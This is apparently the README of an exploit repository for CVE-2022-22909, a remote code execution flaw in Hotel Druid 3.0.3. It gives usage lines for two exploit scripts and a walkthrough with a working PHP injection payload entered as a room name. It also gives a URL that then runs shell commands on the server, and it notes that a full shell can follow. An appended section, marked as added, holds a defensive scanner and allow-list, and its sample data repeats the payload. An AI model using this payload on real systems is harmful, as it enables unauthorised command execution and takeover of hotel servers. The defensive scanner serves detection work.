kaal18/CVE-2022-22909

CVE-2022-22909 Hotel Druid 3.0.3 - Remote Code Execution (RCE)

Exploit by kaal

Exploits

  1. HotelDruidExploit.py

This exploit creates a new room with the PHP payload as the room name.

Usage: $ ./HotelDruidExploit.py -h

$ ./HotelDruidExploit.py -u http://127.0.0.1/hoteldruid

  2. HotelDruidExploitRoom.py

This exploit works if you already know the room name.

Usage: $ ./HotelDruidExploitRoom.py -u "http://127.0.0.1/hoteldruid" -r "abc"

Exploit Walkthrough:

1). Navigate to the Hotel Druid page.

2). Click on Tables -> Rooms.

3). In the Create New Room field, add the PHP code below and click Add.

{${system($_REQUEST[cmd])}}

4). You will see a new room with the payload in the "Room" name field.

5). Go to the link below and you will get command execution; later you can get a full shell.

http://127.0.0.1/hoteldruid/dati/selectappartamenti.php?cmd=whoami

Note: Replace the IP with your Hotel Druid target IP.

Vulnerability Description:

This vulnerability occurs because room names are stored inside /var/www/html/hoteldruid/dati/selectappartamenti.php.

selectappartamenti.php is a PHP file, so any PHP code inside that file is executed by the server.
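
A defensive check for the issue described above, added here as an example and not part of this repository or of Hotel Druid: it scans the generated file for PHP constructs that should never appear in a room name, and shows an allow-list that could be applied before a name is written to disk. The file layout in SAMPLE, the allow-list and all function names are assumptions.

```python
import re

# Constructs PHP evaluates inside a double-quoted string or a .php file.
MARKERS = {
    "interpolation": re.compile(r"\$\{|\{\$"),
    "backtick": re.compile(r"`"),
    "superglobal": re.compile(r"\$_(?:REQUEST|GET|POST|COOKIE|SERVER|FILES)\b"),
}

# Hypothetical allow-list for room names: letters, digits, space and a few
# punctuation characters; nothing PHP treats specially.
SAFE_NAME = re.compile(r"[A-Za-z0-9 _.\-]{1,40}")


def is_safe_room_name(name):
    """True if the name contains only allow-listed characters."""
    return SAFE_NAME.fullmatch(name) is not None


def scan_generated_file(text):
    """Return (line_number, marker_names, line) for each suspicious line."""
    findings = []
    for number, line in enumerate(text.splitlines(), start=1):
        hits = [name for name, rx in MARKERS.items() if rx.search(line)]
        if hits:
            findings.append((number, hits, line.strip()))
    return findings


# Constructed sample; the real layout of selectappartamenti.php is assumed.
SAMPLE = '''<?php
echo "<option value=\\"101\\">101</option>
<option value=\\"Suite (sea view)\\">Suite (sea view)</option>
<option value=\\"{${system($_REQUEST[cmd])}}\\">{${system($_REQUEST[cmd])}}</option>
";
?>'''

if __name__ == "__main__":
    for number, hits, line in scan_generated_file(SAMPLE):
        print(f"line {number}: {', '.join(hits)}: {line}")
```

To audit an installation, pass the contents of dati/selectappartamenti.php to scan_generated_file; any finding means a stored room name needs review.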
